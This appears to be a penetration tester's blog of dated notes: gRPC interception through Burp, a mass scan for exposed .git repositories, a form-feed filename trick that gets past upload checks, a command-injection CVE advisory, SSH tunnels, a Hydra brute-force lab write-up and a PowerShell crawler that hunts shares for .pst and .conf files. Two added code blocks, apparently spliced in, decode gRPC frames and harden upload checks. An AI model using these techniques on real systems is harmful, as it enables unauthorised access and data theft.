Friday, 18 December 2020

intercept http2 (grpc) in BURP SUITE PROXY

as root:

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080

adduser mitmproxyuser


cat /etc/nghttpx/nghttpx.conf   (downstream config)


frontend=0.0.0.0,8080;no-tls
backend=127.0.0.1,8081;;proto=http/1.1
backend-keep-alive-timeout=5m
frontend-http2-read-timeout=5m
frontend-read-timeout=5m
frontend-write-timeout=5m
stream-read-timeout=5m
stream-write-timeout=5m
backend-read-timeout=5m
backend-write-timeout=5m
backend-connect-timeout=5m
listener-disable-timeout=5m
backend-http2-window-size=134217720
backend-http2-connection-window-size=1073741760
frontend-http2-window-size=134217720
frontend-http2-connection-window-size=1073741760
http2-proxy=no
private-key-file=/etc/nghttpx/server.key
certificate-file=/etc/nghttpx/server.crt
cacert=/etc/nghttpx/ca.crt
accesslog-syslog=yes
errorlog-syslog=yes
workers=5


cat /etc/nghttpx/upstream.conf   (upstream config)

frontend=127.0.0.1,8082;no-tls
backend=vendor-IP,28900;;no-tls;proto=h2
backend-keep-alive-timeout=5m
frontend-http2-read-timeout=5m
frontend-read-timeout=5m
frontend-write-timeout=5m
stream-read-timeout=5m
stream-write-timeout=5m
backend-read-timeout=5m
backend-write-timeout=5m
backend-connect-timeout=5m
listener-disable-timeout=5m
http2-proxy=no
accesslog-syslog=yes
errorlog-syslog=yes
workers=5


run nghttpx as root:


┌──(root💀kali)-[/etc/nghttpx]
└─# nghttpx
2020-12-18T14:38:21.383+01:00 8777 8777 99aaafb4 NOTICE (shrpx.cc:2882) Loading configuration from /etc/nghttpx/nghttpx.conf


run a Burp Suite proxy listener on 127.0.0.1:8081 (invisible proxy mode)

User options -> Upstream proxy servers: add 127.0.0.1:8082


as mitmproxyuser:

┌──(mitmproxyuser㉿kali)-[/etc/nghttpx]
└─$ nghttpx --conf upstream.conf
2020-12-18T14:42:00.364+01:00 9293 9293 59e630c7 NOTICE (shrpx.cc:2882) Loading configuration from upstream.conf



as root:

run the Python code (HTTP/2 client)



Forward local connections to local BURP PROXY / MITM PROXY


0)

sysctl -w net.ipv4.ip_forward=1

sysctl -w net.ipv6.conf.all.forwarding=1

sysctl -w net.ipv4.conf.all.send_redirects=0

1)

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d dst_ip -j REDIRECT --to-port 8080

2) useradd --create-home mitmproxyuser

3) xhost +

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;java -jar /usr/bin/burpsuite"   

or 

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;mitmproxy"  
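Once the chain is up, the body Burp shows on 8081 is plain HTTP/1.1 but still gRPC-framed protobuf. Added example, not code from the post and not the missing client: it decodes the 5-byte length-prefixed gRPC frames and walks the protobuf fields of a constructed message without a .proto, and re-frames a payload so an edited body can be resent; a truncated frame raises instead of yielding partial data.

```python
import struct

# gRPC message: 1-byte compressed flag, 4-byte big-endian length, then payload
_PREFIX = struct.Struct("!BI")
SAMPLE_BODY = b"\x00\x00\x00\x00\x0a\x0a\x05hello\x10\xac\x02"  # constructed: 1 frame, {1: "hello", 2: 300}

def encode_grpc_frames(messages, compressed=False):
    """Inverse of decode: prefix each payload (e.g. to resend an edited body)."""
    return b"".join(_PREFIX.pack(int(compressed), len(m)) + m for m in messages)

def decode_grpc_frames(body):
    """Split a body into (compressed_flag, payload) tuples; truncation raises."""
    frames, pos = [], 0
    while pos < len(body):
        if len(body) - pos < _PREFIX.size:
            raise ValueError("truncated gRPC prefix at offset %d" % pos)
        flag, length = _PREFIX.unpack_from(body, pos)
        pos += _PREFIX.size
        if flag not in (0, 1) or len(body) - pos < length:
            raise ValueError("malformed or truncated frame at offset %d" % pos)
        frames.append((flag, bytes(body[pos:pos + length])))
        pos += length
    return frames

def _read_varint(buf, pos):  # protobuf base-128 varint -> (value, new_pos)
    result, shift = 0, 0
    while shift <= 63 and pos < len(buf):
        b = buf[pos]
        result |= (b & 0x7F) << shift
        pos, shift = pos + 1, shift + 7
        if not b & 0x80:
            return result, pos
    raise ValueError("bad varint ending at offset %d" % pos)

def decode_protobuf_fields(payload):
    """Schema-less walk: (field_number, wire_type, value) for varint (0) and
    length-delimited (2) fields; fixed-width types (1, 5) are rejected."""
    fields, pos = [], 0
    while pos < len(payload):
        tag, pos = _read_varint(payload, pos)
        num, wt = tag >> 3, tag & 7
        if wt == 0:
            val, pos = _read_varint(payload, pos)
        elif wt == 2:
            ln, pos = _read_varint(payload, pos)
            if pos + ln > len(payload):
                raise ValueError("field %d runs past end of payload" % num)
            val, pos = bytes(payload[pos:pos + ln]), pos + ln
        else:
            raise ValueError("unsupported wire type %d (field %d)" % (wt, num))
        fields.append((num, wt, val))
    return fields
```

Nested messages show up as wire type 2 values; feed them back into decode_protobuf_fields to go one level deeper.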


Thursday, 17 December 2020

Virtualbox + 4k (3840x2160) resolution on guest

PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata global GUI/MaxGuestResolution "3840,2160"
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe getextradata global GUI/MaxGuestResolution
Value: 3840,2160
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata "Kali" GUI/LastGuestSizeHint "3840,2160"

Wednesday, 16 September 2020

How to parse ffuf output file

ffuf -o output_file

cat output_file | jq -c '.results[] | {url: .url, status: .status}'

for file in dirb/*; do cat "$file" | jq -c '.results[] | {url: .url, status: .status}'; done

Wednesday, 26 August 2020

find .git repo!

curl -s "https://crt.sh/?q=%25.domain.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

Friday, 3 July 2020

Form Feed U+000C

A character that sometimes lets you escape the file extension check in web apps - •
// http://www.fileformat.info/info/unicode/char/000C/index.htm

POST /api/image_upload HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91652467232091688581205088441
Content-Length: 631
Connection: close


-----------------------------91652467232091688581205088441
Content-Disposition: form-data; name="file"; filename=".svg•.pdf"
Content-Type: application/pdf

xxx
-----------------------------91652467232091688581205088441--


HTTP/1.1 200 OK
Date: Fri, 03 Jul 2020 08:09:26 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding,User-Agent
Content-Length: 21
Content-Type: text/html

1593763766-94292_.svg
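A defender's check for the same trick, added here as an example that is not part of the original post: the naive extension test passes '.svg<FF>.pdf' while the name that ends up stored is '.svg' (truncation at the control character is an assumption modelled on the response above); the hardened check refuses any control or format character before it even looks at the extension.

```python
import unicodedata
from typing import Tuple

ALLOWED_EXTENSIONS = {"pdf", "png", "jpg"}

def naive_extension_ok(filename: str) -> bool:
    """The weak check: trusts whatever follows the last dot of the raw name."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS

def stored_name(filename: str) -> str:
    """Assumed backend behaviour: the name is cut at the first control (Cc)
    or format (Cf) character, so '.svg<FF>.pdf' is saved as '.svg'."""
    for i, ch in enumerate(filename):
        if unicodedata.category(ch) in ("Cc", "Cf"):
            return filename[:i]
    return filename

def has_hidden_chars(filename: str) -> bool:
    """True for control, format or line/paragraph separator code points,
    e.g. U+000C form feed, U+0000, U+200B zero width space."""
    return any(unicodedata.category(ch) in ("Cc", "Cf", "Zl", "Zp")
               for ch in filename)

def hardened_extension_ok(filename: str) -> bool:
    """Reject hidden characters and path separators first, then require a
    non-empty stem and an allowed extension on the exact string to be stored."""
    if has_hidden_chars(filename) or "/" in filename or "\\" in filename:
        return False
    parts = filename.rsplit(".", 1)
    if len(parts) != 2 or parts[0] in ("", "."):
        return False
    return parts[1].lower() in ALLOWED_EXTENSIONS

def upload_decision(filename: str) -> Tuple[str, str]:
    """Verdict of the hardened check plus the name the backend would keep."""
    verdict = "accept" if hardened_extension_ok(filename) else "reject"
    return verdict, stored_name(filename)

if __name__ == "__main__":
    # constructed sample names; the second is the one from the request above
    for name in ("report.pdf", ".svg\x0c.pdf", "notes.txt\u200b.pdf"):
        print(repr(name), "naive:", naive_extension_ok(name),
              "hardened:", hardened_extension_ok(name),
              "stored as:", repr(stored_name(name)))
```

The same rule applies to every string the server derives from the upload (MIME type, Content-Disposition fields): validate the exact value you are going to store, not the value before normalisation.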

Tuesday, 5 May 2020

Alcatel-Lucent Security Advisory: CVE-2020-11794 (RCE)


OTMS remote code execution


I have discovered a vulnerability in OpenTouch Multimedia Services, making it possible for an attacker with administration rights to execute code on the server via web requests with high privileges.



Description of the vulnerability

The CGI script vmconstruct.cgi is vulnerable to shell command injection through HTTP POST requests. An attacker holding an OT administrator cookie can inject arbitrary OS commands by using the semicolon (;) character in the web request.

Impacts

This OS command injection gives the attacker elevated shell access on the OT server.


Reference: CVE-2020-11794
Date: April 15th, 2020
Risk: High
Impact: Get access
Attack expertise: Skilled, Administrative user
Attack requirements: Remote
CVSS score: 8.0 (HIGH)


Thursday, 26 March 2020

SSH SOCKS proxy between Lan1 and Lan2

Linux in Lan1: ssh -R 5555:localhost:22 w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -L 5000:127.0.0.1:5555 w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -D 1234 root@localhost -p 5000

Sunday, 22 March 2020

Lab Pentestit 14 - writeup

1. Crack password for mail
# cat logins_mail.txt
sidorov@test.lab
ivanov@test.lab 
petrov@test.lab 
support@test.lab


hydra -L logins_mail.txt  -P /tmp/1 imap://192.168.101.14 -t 60 -f  -I                                                                             
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://192.168.101.14:143/


[ERROR] IMAP LOGIN AUTH : 2 NO [AUTHENTICATIONFAILED] Authentication failed.


[143][imap] host: 192.168.101.14   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12


telnet 192.168.101.14 imap                                                         
Connected to 192.168.101.14.
Escape character is '^]'.
*
a1 LOGIN support@test.lab PASSWORD
a1 OK
^]
telnet> quit
Connection closed.




HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All the fun is in enumeration. Start by enumerating employee accounts. The website turns out to be useful.


Monday, 27 January 2020

Turbo intruder sample code

# Turbo Intruder script (runs in Burp's embedded Jython; RequestEngine and
# table are injected by the extension, so no imports are needed)
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=False
                           )

    # queue the same request 1000 times
    for i in range(1000):
        engine.queue(target.req)

    engine.start()

def handleResponse(req, interesting):
    # only add responses containing the marker string ("cos" = "something" in Polish)
    if "cos" in req.response:
        table.add(req)

Tuesday, 21 January 2020

Searching for readable files on network shares - PowerShell

$REMOTE_HOST = "172.21.56.235"

# -Include expects an array of patterns, not one comma-separated string
$FILE_TYPES = @("*.pst", "*.conf")

# Parse share names from 'net view' output; 'Dysk' is the Polish-locale
# share-type label (English systems print 'Disk')
net view \\$REMOTE_HOST\ |
ForEach-Object {
    $path = [regex]::match($_, '(.*)\s+Dysk').Groups[1].Value.Trim()

    if ($path -ne "") {
        Write-Host ("### PATH: " + $path)
        Get-ChildItem -Path \\$REMOTE_HOST\$path -Include $FILE_TYPES -Recurse -ErrorAction Ignore |
        ForEach-Object {
            Try {
                # Opening for read and closing immediately tests effective read access
                [System.IO.File]::OpenRead($_.FullName).Close()
                Write-Host $_.FullName
            }
            Catch {
                #Write-Host ("Not readable: " + $_.FullName)
            }
        }
    }
}



// Author: hagier